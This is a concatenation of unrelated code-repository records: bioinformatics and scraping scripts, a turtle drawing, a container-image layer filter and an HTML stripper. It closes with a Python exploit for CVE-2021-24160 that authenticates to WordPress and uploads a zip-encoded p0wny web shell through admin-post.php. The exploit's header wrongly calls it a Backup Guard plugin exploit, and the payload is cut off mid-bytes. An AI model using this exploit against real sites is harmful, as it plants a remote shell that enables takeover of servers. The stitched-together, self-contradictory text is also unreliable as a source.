"MIT"
] | null | null | null |
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
"MIT"
] | null | null | null |
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
"MIT"
] | null | null | null |
'''
run_bbtrim.py
Use bbduk to trim adapters and poly(A) from Quant-Seq reads as recommended by Lexogen.
'''
import os
from snakemake.shell import shell
extra = snakemake.params.get('extra', '')
log = snakemake.log_fmt_shell(stdout=True, stderr=True)
sample = [snakemake.input] if isinstance(snakemake.input, str) else snakemake.input
n = len(sample)
assert n == 1 or n == 2, 'input->sample must have 1 (single-end) or 2 (paired-end) elements.'
outprefix = os.path.dirname(snakemake.output[0]) + '/'
shell(
'bbduk.sh '
'in={snakemake.input} '
'out={snakemake.output.fastq} '
'{snakemake.params.extra} '
'{log}')
| 26.541667
| 93
| 0.692308
|
e536912bc7085cab167479d11cf3aaea5c4071ac
| 1,741
|
py
|
Python
|
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
recipe_parser/recipes/justbento.py
|
tyler-a-cox/recipe-parsing
|
fa883f66a39063cf72912527628b082cda455e76
|
[
"MIT"
] | null | null | null |
from ._schema import DefaultSchema
from ._utils import get_minutes, normalize_string
class JustBento(DefaultSchema):
@classmethod
def host(cls):
return "justbento.com"
def title(self):
expected_prefix = "Recipe: "
title = self.soup.find("meta", {"property": "og:title", "content": True})
return title.get("content").replace(expected_prefix, "")
def total_time(self):
time = self.soup.find(
"div", {"class": "field-name-taxonomy-vocabulary-2"}
).find("a", {"typeof": "skos:Concept"})
return get_minutes(time)
def yields(self):
return "1"
def ingredients(self):
ingredients = (
self.soup.find("div", {"class": "field-name-body"}).find("ul").findAll("li")
)
return [normalize_string(ingredient.get_text()) for ingredient in ingredients]
def instructions(self):
elements_after_title = (
self.soup.find("div", {"class": "field-name-body"})
.find("h3")
.find_next_sibling("ul")
.find_next_siblings()
)
instructions = []
for element in elements_after_title:
if instructions and element.name != "p":
break
if element.name == "p":
instructions.append(element.get_text())
instructions = [
normalize_string(instruction) for instruction in instructions
]
return "\n".join(instructions) if instructions else None
def image(self):
image = self.soup.find("div", {"class": "field-name-body"}).find(
"img", {"class": "centerimg", "src": True}
)
return image["src"] if image else None
| 31.654545
| 88
| 0.572085
|
371d8cd2e29beb9f7a218bd487e4de4f17a9a695
| 215
|
py
|
Python
|
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
01 Fundamental/Session 04/homework/shape2.py
|
culee/c4e
|
775c53fa92a31696431760f58a79a52889bfb46f
|
[
"MIT"
] | null | null | null |
from turtle import *
hideturtle()
color("blue")
speed(-1)
length = 110
setheading(-140)
while length > 0:
for j in range(4):
forward(length)
right(90)
right(10)
length -= 2
mainloop()
| 12.647059
| 23
| 0.6
|
8f7b2de9491044e1a7c776f548957763158b2774
| 6,405
|
py
|
Python
|
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
container/util.py
|
adracus/cc-utils
|
dcd1ff544d8b18a391188903789d1cac929f50f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed
# under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import json
import tarfile
import tempfile
import container.registry
import util
def filter_image(
source_ref:str,
target_ref:str,
remove_files:[str]=[],
):
with tempfile.NamedTemporaryFile() as in_fh:
container.registry.retrieve_container_image(image_reference=source_ref, outfileobj=in_fh)
# XXX enable filter_image_file / filter_container_image to work w/o named files
with tempfile.NamedTemporaryFile() as out_fh:
filter_container_image(
image_file=in_fh.name,
out_file=out_fh.name,
remove_entries=remove_files
)
container.registry.publish_container_image(
image_reference=target_ref,
image_file_obj=out_fh,
)
def filter_container_image(
image_file,
out_file,
remove_entries,
):
util.existing_file(image_file)
if not remove_entries:
raise ValueError('remove_entries must not be empty')
with tarfile.open(image_file) as tf:
manifest = json.load(tf.extractfile('manifest.json'))
if not len(manifest) == 1:
raise NotImplementedError()
manifest = manifest[0]
cfg_name = manifest['Config']
with tarfile.open(image_file, 'r') as in_tf, tarfile.open(out_file, 'w') as out_tf:
_filter_files(
manifest=manifest,
cfg_name=cfg_name,
in_tarfile=in_tf,
out_tarfile=out_tf,
remove_entries=set(remove_entries),
)
def _filter_files(
manifest,
cfg_name,
in_tarfile: tarfile.TarFile,
out_tarfile: tarfile.TarFile,
remove_entries,
):
layer_paths = set(manifest['Layers'])
changed_layer_hashes = [] # [(old, new),]
# copy everything that does not need to be patched
for tar_info in in_tarfile:
if not tar_info.isfile():
out_tarfile.addfile(tar_info)
continue
# cfg needs to be rewritten - so do not cp
if tar_info.name in (cfg_name, 'manifest.json'):
continue
fileobj = in_tarfile.extractfile(tar_info)
if tar_info.name not in layer_paths:
out_tarfile.addfile(tar_info, fileobj=fileobj)
continue
# assumption: layers are always tarfiles
# check if we need to patch
layer_tar = tarfile.open(fileobj=fileobj)
have_match = bool(set(layer_tar.getnames()) & remove_entries)
fileobj.seek(0)
if not have_match:
out_tarfile.addfile(tar_info, fileobj=fileobj)
else:
old_hash = hashlib.sha256() # XXX hard-code hash algorithm for now
while fileobj.peek():
old_hash.update(fileobj.read(2048))
fileobj.seek(0)
patched_tar, size = _filter_single_tar(
in_file=layer_tar,
remove_entries=remove_entries,
)
# patch tar_info to reduced size
tar_info.size = size
new_hash = hashlib.sha256() # XXX hard-code hash algorithm for now
while patched_tar.peek():
new_hash.update(patched_tar.read(2048))
patched_tar.seek(0)
out_tarfile.addfile(tar_info, fileobj=patched_tar)
print('patched: ' + str(tar_info.name))
changed_layer_hashes.append((old_hash.hexdigest(), new_hash.hexdigest()))
# update cfg
cfg = json.load(in_tarfile.extractfile(cfg_name))
root_fs = cfg['rootfs']
if not root_fs['type'] == 'layers':
raise NotImplementedError()
# XXX hard-code hash algorithm (assume all entries are prefixed w/ sha256)
diff_ids = root_fs['diff_ids']
for old_hash, new_hash in changed_layer_hashes:
idx = diff_ids.index('sha256:' + old_hash)
diff_ids[idx] = 'sha256:' + new_hash
# hash cfg again (as its name is derived from its hash)
cfg_raw = json.dumps(cfg)
cfg_hash = hashlib.sha256(cfg_raw.encode('utf-8')).hexdigest()
cfg_name = cfg_hash + '.json'
# add cfg to resulting archive
# unfortunately, tarfile requires us to use a tempfile :-(
with tempfile.TemporaryFile() as tmp_fh:
tmp_fh.write(cfg_raw.encode('utf-8'))
cfg_size = tmp_fh.tell()
tmp_fh.seek(0)
cfg_info = tarfile.TarInfo(name=cfg_name)
cfg_info.type = tarfile.REGTYPE
cfg_info.size = cfg_size
out_tarfile.addfile(cfg_info, fileobj=tmp_fh)
# now new finally need to patch the manifest
manifest['Config'] = cfg_name
# wrap it in a list again
manifest = [manifest]
with tempfile.TemporaryFile() as fh:
manifest_raw = json.dumps(manifest)
fh.write(manifest_raw.encode('utf-8'))
size = fh.tell()
fh.seek(0)
manifest_info = tarfile.TarInfo(name='manifest.json')
manifest_info.type = tarfile.REGTYPE
manifest_info.size = size
out_tarfile.addfile(manifest_info, fh)
def _filter_single_tar(
in_file: tarfile.TarFile,
remove_entries,
):
print('looking for: ' + ', '.join(remove_entries))
temp_fh = tempfile.TemporaryFile()
temptar = tarfile.TarFile(fileobj=temp_fh, mode='w')
for tar_info in in_file:
if not tar_info.isfile():
temptar.addfile(tar_info)
continue
if tar_info.name in remove_entries:
print(f'purging entry: {tar_info.name}')
continue
# copy entry
entry = in_file.extractfile(tar_info)
temptar.addfile(tar_info, fileobj=entry)
size = temp_fh.tell()
temp_fh.flush()
temp_fh.seek(0)
return temp_fh, size
| 32.348485
| 99
| 0.645433
|
c6cdf3f92c71644f0a872fbc8f463c117c85de2a
| 362
|
py
|
Python
|
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | 6
|
2016-03-11T08:31:02.000Z
|
2020-06-25T14:12:47.000Z
|
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | null | null | null |
MLStripper.py
|
trovdimi/wikilinks
|
835feb3a982d9a77afc88b6787b4b84c411442db
|
[
"MIT"
] | 1
|
2018-03-24T13:06:25.000Z
|
2018-03-24T13:06:25.000Z
|
from HTMLParser import HTMLParser
__author__ = 'dimitrovdr'
#taken from http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
| 25.857143
| 88
| 0.671271
|
cc029f2dd3c284677dee407de840aff596c425ed
| 16,746
|
py
|
Python
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 26
|
2021-06-02T06:53:18.000Z
|
2022-03-24T07:06:00.000Z
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 4
|
2021-07-17T05:39:35.000Z
|
2022-03-24T08:24:10.000Z
|
Wordpress/CVE-2021-24160/exploit.py
|
Hacker5preme/Exploits
|
4360551dd8ac194768e8be32ad709ecaf421480f
|
[
"MIT"
] | 6
|
2021-07-26T04:29:31.000Z
|
2022-03-21T17:34:44.000Z
|
# Exploit Title: Wordpress Plugin Backup Guard < 1.6.0 - Remote Code Execution (Authenticated)
# Date 05.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://responsive.menu/
# Software Link: https://downloads.wordpress.org/plugin/responsive-menu.4.0.2.zip
# Version: 4.0.0 - 4.0.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24160
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24160/README.md
'''
Description:
In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing
malicious PHP files that would get extracted to the /rmp-menu/ directory.
These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow
an attacker to execute commands to further infect a WordPress site.
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _ __ ___
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / |/ /_ / _ \
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | '_ \| | | |
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| | (_) | |_| |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|\___/ \___/
* Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Responsive Menu 4.0 - 4.3.0 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Exploit:
'''
print('')
print('[*] Starting Exploit:')
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-post.php'
# Header (Exploit):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "application/json",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=rmp_menu&page=themes',
"Cache-Control": "no-cache",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------12473561203192832341566500492",
"Origin": "http://" + target_ip,
"Connection": "close"
}
# Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell)
body = "-----------------------------12473561203192832341566500492\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nrmp_upload_theme_file\r\n-----------------------------12473561203192832341566500492\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x00\x08\x00\x08\x00\xef\xbb\xb9R\x00\x00\x00\x00\x00\x00\x00\x00TB\x00\x00\t\x00 \x00shell.phpUT\r\x00\x07\xb3l\xad`-\xe2\xe2`\xb3l\xad`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\xc5\x1b\xffz\xdb\xb6\xf1?\x05\xcax\x11\xd5H\xa4l\xd7I+[r\x13\xdbY\xd2\xb9M\x16;\xdd\xf6Y\x9eF\x91\x90\xc4\x9a\"9\x92\xb2\xecU\xee\xb7\xa7\xd9\x83\xedIv\x07\x80\x14H\x82\x94\x94d\x1b\xd3J\"p\xb8\xdf8\x1c\x0e\xf0\xf1I8\rwv\xc6s\xdfN\xdc\xc0'cj%\xf3\x88^N\xa9\xe7\xe9\xbb\xf6\xcci\x91]{\xe14\xc9\xaf;\x04\x9e\xdd8q\x82yBz\xc4\x8a\"\xebAo\x1e\xed\xb0vwL\xf40\xa2\x93\xe1\xccJ\xec\xa9\xae\x99\x1d\xc4_\xdb\x0e|\xec\x9a\x1a\xa2\x989\xcd\x14\x07>\xa6IB+\x8e\xd9\xfb#\xa1^L+1<\xd3\x8dgM\xf8\xad\xef\xf7\x9f\xee5O\xd4\xf8\xec\xa9\xe3F:\xe3\xf4(k\xac@w\r?o\x94(\xe1\x93\x81K8\x04b\xd6|\xbdw#zjXv\x82\x85\xef\x05\x16R\xe2\x84\xbe\x0c\xeb\x12\xda\xed\x04\x88(\xd83\xb3\xeb\x99@S!\xd1:\xb6\xe8=\xb5S\xaf\xe0\x9e\x90\x0e\xe7n \x88q\xdf\xc8Fi\x1cT#\xbd~:\xac\xb5\xea\x04\n\xacgB\x13\xf8\xa97Y\x0f\xa0},{\xe5{\xec\x17<\xe6H\x95\x90\xa8\xc7\xbfq\xfdD\xdf\x1d\xbb\x1e\xfd\xc9\x9aQ\xee\xd9\xf0\x99<\x844E[\x12\x1b\x8d\xcc H\xafG\x1a zC6\x1e\xea\x02&\x83f\x07\xb3pB}\xd2\xb6I\x86_\xab\xd0li\xcc\xb8<fG\x064G\xaeo\x8e\xacx\x8a\xe8\x07\x1a6\x0f4\x01\xc9F\xc6\x00E\xefC/p\xa8\xae\r|p\x86\x18\xe7\xef03WS\x08\xa3\xb6O\x83\xe1h0\xf3\xb0\x9f\xad\x1a\x1b\xac<\x08A\xdf[\xc94\x8b\r\xd8\x00\x9c|\x8f\xdfC\xb0\xc4\xd0\x0e\xfc\x84\xfaI,\xc1JJ\xe5\xe0\xa0\xd5\xd7//.\xcfe\xad\xaa\xd9d\xacr\xf7a\xbc\xf2\xee\xc6kD\xe3\x07\t\x19\x07s\xdf!&\xfc\x06\x04\x96CB\x1a\xcd\xdc8\x06\xde\x8dF\xb3\x95G\x03\xf6m\x94\x9cN\x08\xad4Z\rK>\xd8\x8d!\x03\x13Q|\x91\xc4-\x90\xc5\xf6\x0c\xf4\xf97C\xea\xdbh3\x06_\xe6A\xa5\xfe\x8f!W~\x08\xd8[\\\xe5\xf9\x08]r\xe0\xdd1\xb3I\x10R?\x1d\xd6X\x8c\x1a9K|\x013\xbc\xf5\xef,\xcf\x05\xad\x03\x05n\x84E\xe4&\xf4\xcbZa\xccp\x02\xc3\xadT\x83\x0e\x954(E\xaa\xb1\xed\x051\xb6\x97C\xe1f\xf2\x9c\x05>\xfd\x04\x8e\xd1f\xa8S\x10\x99B\xac\x19\xfe\xfe\xfc\xeaZ\x13\xb6\xd3nX\xe0\xe7V\x89h\x1c\x06~\x8c\x13\xe6\xa7\x8f\x17\x17b\x1d\x8d\x17.\x84eR\x1e(Gf\x90\x1cb*\xcep\xad\x9bcO\x04\x8c\xdd\xe1\xfbw\x97W\xd7,X\xdd\x1c\xe5 \x90\xb5\xaf\xa4\xc5\xa5a\xee\xf7\xcd\x86bU\xca\xa14 \xf2\x11\\j\x1ayl\x8fy\xea\x92H\xaa4\x82s\xc5B\xf5M3\x8fh\x04\x13\xf6\xf6\xa8 a\x08\x80\xddu\x14\xd8\x92\xb0\x01\xb2)\x84\xfe\xf5\xd8\xf8\x02!\xd4\x87.\xc5\xe6\xf6Mk\xa5R\xb0\xbf\xf4\x8a\xebBc\x13a\x1as6o\x1bk9H\xe7\xb7 \x80\xb3I&\xc8\x02H\x91\x9f\xfc\x1a<\x85\xd8G#];\xe5\xc1\xb7}\x05<v\x89\x15\x86\x9ek[\x18J\xcc_\xe2\xc0\xd7\xc4 jO\x03\x82\rY,Jy\x12\x00\x8eKu\xbe\x12\x9c\xf4\x8f\xbf:{wz\xf5\x97\xf7\xe7d\x9a\xcc\xbc\xfe\xce\xce\xb1\xf8F\xc0c$\xdc\xcf\xe4;\x9e\xd1\xc4\x82hdE0\x11z\xda\xc7\xab\xd7\xedo5bJ\x00\x89\x9bx\xb4\x1fv\x16\xfe\xc3\xf7\xcc\x9b\xbb\xbf=96yk\x01\r\x9a\xa1\xa7\xdd\xb9t\x11\x06\x11$\x12ba\xe9i\x0b\xd7I\xa6=\x87\xde\xb96m\xb3\x97\x16q}7q-\xaf\x1d\xdb\x96G{{F'O6N\x1ed\x02Le \x05D\x94\xc0yP\xcc\x80\x99\x15M\\\xbfK:G\xa5\xae\xd0r\x1c\xd7\x9f(\xfbF\x96};\x89pI\xea\x92'\x07\x07\x07e\x08;\xf0\x82\x08:)\xa5\xe5\xce1H\xd8\x1e[3\xd7{\xe8\x92Y\xe0\x07qh\xd9\xb48\xfdr\xaf_w\xbb\xed\x05\x1d\xdd\xba\t\x88\x1e\x05\x9e7\xb2\xa2v\x12\x01\x1f\n\xa9FA\x04^\xd2\x8e,\xc7\x9d\xc7]\xf2mx_'B;\xe5\xf5\xe0\x10\xffm\xcd\x86\x82\x01f\xac\n\xc2S\xeaN\xa6\x89\xa2s#\x89\xa7\xf3\xd9\xe8\x13%N\xb1\x8d\x82\xfbv<\xb5 \xe9\xee\x82;\x81\x03\x93\x0e\xfc{\x1e\xde\x93h2\xb2\xf4N\x0b\xff\x19\x07\xcd\x8dt6\xb2\xf1_\xad O\x98\xff\xab\x98\x96\xbdh\xbfLpf\xdd\xb7S]v:*\xa1R\x07>\x84^b\xcd\x93\x00D\xc1/\x05\xf3\x92\xd8(\xf0\xe1J`\xc2\xffS\xca\xcc|5v\xff\x01af\xaf\x13&e\x00\xc7\x8dC\xcf\x02G\x1e{T\xc1 \xb6\xb6!k\xa1,\xd3\xe9\xe2\xc4\x98\xcf\xfc2\x1c\xe4\x17\x13\xbf\r\t\xc0\x0c\xec\x17'\xb0\x9c\xdb\xd3\r\xd4\xda\x16\xd1B\xa1\xde\xd4\xd1\x0e\xd5\x9a\x0b\xeeh4\xf6P\x1bj}e\xf3\xffP5z1\x05V\xdbl\xdevqC\xd7^DVX!=\xd8\x18\xa8\xecm\"\x8d\x17L\x02\x85(\xcc\x08\x0b!\xcf(\xf0\x9c\xea\x80\xf3\xfa\xf57{\xdf*BVB\xef\x936S2\xd8\x00\x14F\xa3Z~\xbe\x9fQ\xc7\xb5\x88.y\xe0w\xdf\xed\x85\xf7\xaa4\xa2\x9e\xf7\x8c\xeeD\xcfU\xda\xc4'\xf5\xe4\xf6>z\xa6B\x82\x02\x87\xf8\xacb{\xabz\x9a1@\xa1\xbb\xbdN\xe7wj\xf2B\xc8j\x00I\x13>\xa4\x8f\x1b\xf1W\xcb\x13\x17\xb8\x9d\x04\xa1r\x8dy\xdc\xd2</\x9e\xbf\xa85\x8f\xeb\x87s\xd54\xc1g\xd3I\xba-O\x07\xfb\x9d/\xe02\xca\tX\xcb\x8a\xc1\xd1\x87\x11\xec\xc2U2o1\x9f^\x1c\x9e\xbd\xee\xbc\xaa\x9d+yj}\x02Q\xc1W\x10M1\xee\xbd:\xfd\xee\xfc\xc5&\xd1\xa0\xcadkBn>\xd2\xb7\xf7p:m\x12\xea\xc5\"\xca\x1c\x92\x81\xef\x1f\x1e\xb6\xc8\xea\xc3\xe8\x1c6I\x1c\xe0Fpo\xcd\xe2\x9d\x13\xa0O<kDU\xd3@\n\x8f\x8a\x19\x90\x899\xf2\x02\xfb\xb6\xdc\xbf\xca\xd0\xd4.\x92N\xfa\x03e\xfc\xf7\\\x9f\xb6\xabA\xea\x04J\x97\x1e\xd8=U/;\x9fD\x15\x1fn\x86\xaa(#'\r\x90\xff\xf9\xe0l\x11\x84\xf3\xffB\x06\x9a\xc1\xd5\xad\xfe\xb5a\x93\xaf\xe91\xf5\xc6\x1b\xad99\x1d;\xee]\xbd\xc3\xecU\xd1\xdb>\x87\xe0\x14\xabf[0O\xd0j*\x83\xac\x82\xd0\xb1)\xb6\x1e\xd2^\xc4\x8e\xdc0\xc9oF\xee ]>\xfd\xd3\x19l\t\xfd\xb9\xe7\x1d\x95\xfa\xec`6\xb3|\xe7\x8d\x1b'A\xf4\x00`\xd77e\xa0)\xef}\x1f\xc4.\xab\x1e\xf5\x8a\x93\x07\x81\xf8\xf6\xfct\xe6\xbcebU\x11\x14`\"\x89J\xa1r`Y\x95j\x88\xd9r\x94\x9cr\x1eu\xc1\xab*\xbc\xe7\xb0\x1a\xae\xef\xd3\xe8\xcd\xd5\x8f\x17\xe4Y\x8fh\x03\xe0ke\xdb\xd5\x0ci\x1c\xb3\x88j{V\x1c\xf7\x06\x9a\x1cm\x07Z\xbfA\x9e\x91\t\xf5\xdf\xb3w\x1d\x94\xdb\x84\x86\x06\xd8\x03\xc6\xf4Ic+J\x14\xb6\x95!}\x03YE&\xddV\xe3\xb5\rD\xe3\x9b\x99\xab \xc4\xba\xae\xa2\xe7\r\x0b\x0e\xb5n[\xb4\xc8%+p\xe9\xa2h\xbf\x9d=$\x91sE\xff\xff\x91\x00\x0e\x1d\xd3H\x87\xcd\xbc\x87\x81M\xc5;l\xd0\xae\xdc\x19E\x01S0X\xc2\x9a\x9b\xe1\xcf\x95\xaa$\x87-Q\xa9\xf0\xed\xb2.\xb0\xc8\xc6\x0emx\xd1G>\t\xda5\x8d\x84\xc6I6X%\r\xe3.W\r\x12\xd0\x06\xaf\xd9\xe5QK\xa7A\xbbfsu\xa0\x93\x13\x9d\xd7Q3\xbel\x8fZ\xd1\x16\xdc\x98&y\x05:\xa5\xbe\xc3\x0f\x16\xc8\xd5\xf9\x87\x1f\t\xf5\xef\xdc(\xf0g\x18\x15 N\xb8\xd6H\x14\xe2\xc1\x1c\x069E\x1ai\xb0J\xe3\x11\x19\xc3\x14$\x1f\xdf\x92\x11\xc4\x9b[JC\x88\xa8\xf0{\x0c\x06V\x12\xaerJ\x98\xf0\x8aY[*\x17\xcb\xcf\xcc\xba\xa5\x1f\xe8\xdf\xe7(\xafv\"\xf4\xdb\xe3U\xd4\x16\xf9\x15\x16\xean\xcam\x8b\xd8\x0bx\x838\xf1\xd8Z\xf9\x89\x9e\x15\xc6*(\xa4\xa6O\xe1\x8c\xa9\x15\xbf[`\xd4\t\xc1m\x1et^\xbc\xabTr\xfa\x14\xcfY2t>;\xb3\xca^\xf3g\x06[\xe9\"}\xf2\xb1!\xc3\xcc'\xb9\xf1K\xe0\xfa\xec8\xa9\xa9p)\xf9\x99\x87\x8e\x95\xd0\xd3\x85\xc4k\xfe\xd8\xb0\xc4\x9c\xb2\xe7Q\xe5\xb9\xdbLaV\xbdU\xa9\x17\xad\x92_\xec\x8c;\xcb\x9bS#\x89\xdc\x99\xde4<\xeaO\x92);\x04\xe94\xc51\xc1\x11s\xfb\xb1K=\x87\xb81\xa1\xb0r<\x90v\x1f\x1d|\n\x19%I\x02t\x97\xd0\xa3\t-\x87\x8aU\xf0\x8a\xb8\xcb\x9d\x8a\xb0\xa4\x83\xa6\xac*\x0f@6\xb1\x9f\x996N\xb9:\xee\x91\xbd<S~F\x1aH\x94\x89W\xa3B\x01\xf7\xd7\xb9\xaf8\xebT\x1cv\xaa\x1e\x95Zaz\xaeh_wnj\x1ca\x13/eI\xcf<\xc2\x14\xf6g\x81^E\xb5\xdeG+\xf8\x94\xf1\x1a\x11\x85\xbd\x84Mu\x93\xc7\xd4\xaf\x9b\xbbf+/\xc9\xf6>\xbdN\xc0\xc2\xa2\xa2b\xb3\x86h~\x02K\x06_;w\xcb\xec*j\x13\x92\xe6O\xd9\xc9\x92r\x12\xc1\x0e\xcc\x85\x98J4\x05)\xc4\xc0\x1d\x8a\xe8+L\xb2?\x82o\x9f\x10\r\\M#]\xa2!\xf7\x8a\xf4\x08\xd1\xa4G\xe4\x88*\xf3Q6\x101\xac\x90\x83\x99\x00\x93\xf4^\xa6\xdb&{7Geq\xe5%B\xa9\xb4\xd5\xba\xc1\x8e\x93ZJ\xa0j[\xa7\x07J\xddL\x165\x06|\xd2\x15\xa8\x1a\"a\xe7:\xf8\xa96\xb0zd1 \x95\x80\x9a\x05\xc5\xac\x89\xb9\xd92\xc5W'\xb6()T\xc0\xf6\x11\x1e\x9d\xf1\x1d\x84\x13\xd8s\xfci\xd8\x11`\xa1\xe7\xbcCoX\rUf\xc9{\r\xc8*^&\x10\xb0!u\xa0zc\x1a\xd1q\xa3E\x1a\xe8\xf3]\xf9p+\xb0\x13\n\xfbQ\xd8\xd9Y\xb3#~H\xdc\xc2\xfc\x9fq\xb6)\xf6\xf4\xb6\rP@\xb9\xea\xc6\xe1\x96\xce\x10e\x08\xccKp\x07\xa8\xc8M2\x91\xb1\x12i\x00\xc3\x90L\x9dN]\x0f\xa6<\xc7TC\xc3\x06\xe1n\x8b\xa7\x9ce\xa4\x11\x9d\x05wt\x1d\xd2|\xc8H\x8f\xb9\xb7J\x95EV\x1aJw?\xe4g3[\xb3\xad\xf4\xe6\xf6f'\xad-q\x83\xe2\xffl\x0f\xcbq\xce\xef\xe0\xc7\x05$\xb5\x14RR\xbdaO-\x82\xfc\xad\xb2\xc5\xaa\x85\x13\xb5\x83\x1bS\x97\x9d\xfaNh\xf2\x8a\xf9hJv\xddR#\x86\x1a\xc9\x94\xfa\xfa\x8aZ\xd5\xbcK\x1f9\xb45\xb2(&\x0e\xa5!\xfdE[v\t\xbf\x1d\x82\xb8x\x88\xfa\x8cD\x18\x9f\xff[zY\xb5\xe6mb\x9f2\xe3\x8d\x97>\x99\xfb\xb7>\xc4\x04\x02S\x91\xb2r\x97C\t\x8d\xa2 \"\x81\xcd\xd6\x17\xa74\x89\xea\xb8Q\xb5}\xf1\xd9^5\x8bW>\xc7m\x1c\xf8\x17\xe0\x05\xa75\xfbkqq\xc6\xa7\x0b\xf2\x9e\xfb_\xe6zh\x93\xc0\xbbc\x1b\x93_\xa8\xad,-\xe0\x83n\x1f\xb1\x9b\tXA\x02Dxm\xeb\x03\xbf\xaaP\xa18\x0en\x04,\x12\xe3\r\x89\x94$\xd0 